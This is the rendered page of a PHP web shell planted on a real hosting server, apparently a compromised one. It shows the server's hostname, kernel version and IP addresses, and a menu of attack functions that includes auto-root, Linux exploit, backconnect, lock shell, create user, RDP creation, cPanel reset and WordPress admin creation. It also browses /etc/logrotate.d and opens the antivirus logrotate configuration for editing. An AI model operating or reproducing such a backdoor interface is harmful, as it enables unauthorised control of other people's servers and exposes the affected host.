Linux server.hostify.co.in 5.14.0-611.49.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Apr 21 16:39:08 EDT 2026 x86_64
Apache
: 162.214.74.213 | : 216.73.217.79
438 Domain
8.2.31
orangegroceries
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
etc /
logrotate.d /
[ HOME SHELL ]
Name
Size
Permission
Action
apache
195
B
-rw-r-----
btmp
130
B
-rw-r--r--
chrony
160
B
-rw-r--r--
dnf
88
B
-rw-r--r--
dpkg
112
B
-rw-r--r--
ea-php80-php-fpm
257
B
-rw-r--r--
ea-php81-php-fpm
257
B
-rw-r--r--
ea-php82-php-fpm
257
B
-rw-r--r--
ea-php83-php-fpm
257
B
-rw-r--r--
ea-php84-php-fpm
257
B
-rw-r--r--
ea-php85-php-fpm
257
B
-rw-r--r--
exim
405
B
-rw-r--r--
firewalld
93
B
-rw-r--r--
imunify360-antivirus
1.06
KB
-rw-r--r--
kvm_stat
162
B
-rw-r--r--
lfd
172
B
-rw-r--r--
modsecurity_logs
277
B
-rw-r--r--
mysql
972
B
-rw-r--r--
named
368
B
-rw-r--r--
nscd_logs
180
B
-rw-r--r--
psacct
312
B
-rw-r--r--
rkhunter
86
B
-rw-r--r--
rsyslog
226
B
-rw-r--r--
samba
155
B
-rw-r--r--
sssd
289
B
-rw-r--r--
sulsphp_log
276
B
-rw-r--r--
sw-engine
114
B
-rw-r--r--
wp-toolkit
163
B
-rw-r--r--
wp-toolkit-action-logs
7.72
KB
-rw-r--r--
wtmp
145
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : imunify360-antivirus
# Logrotate configuration for logs managed by imunify-antivirus package. # This file is installed by the imunify-antivirus package. /var/log/imunify360/aibolit_actions.log /var/log/imunify360/mds_actions.log { # Rotate daily, or sooner if size exceeds 50MB (checked when logrotate runs) daily maxsize 50M # Keep rotated files for 3 days maxage 3 # Add datetime to rotated filename # Note: CentOS 7 logrotate doesn't support %H%M%S, using %s (unix timestamp) for uniqueness # Rotated files will have following names: aibolit_actions.log-20260107-1767805468.gz dateext dateformat -%Y%m%d-%s # Don't error if log file is missing missingok # Don't rotate empty files notifempty # Copy and truncate instead of moving the log file # This allows the service to keep writing without restart copytruncate # Compress rotated files with gzip. # I would prefer to use zst when it is available, # but this requires conditional compression and postrotate # script, what makes config more complex. compress }
Close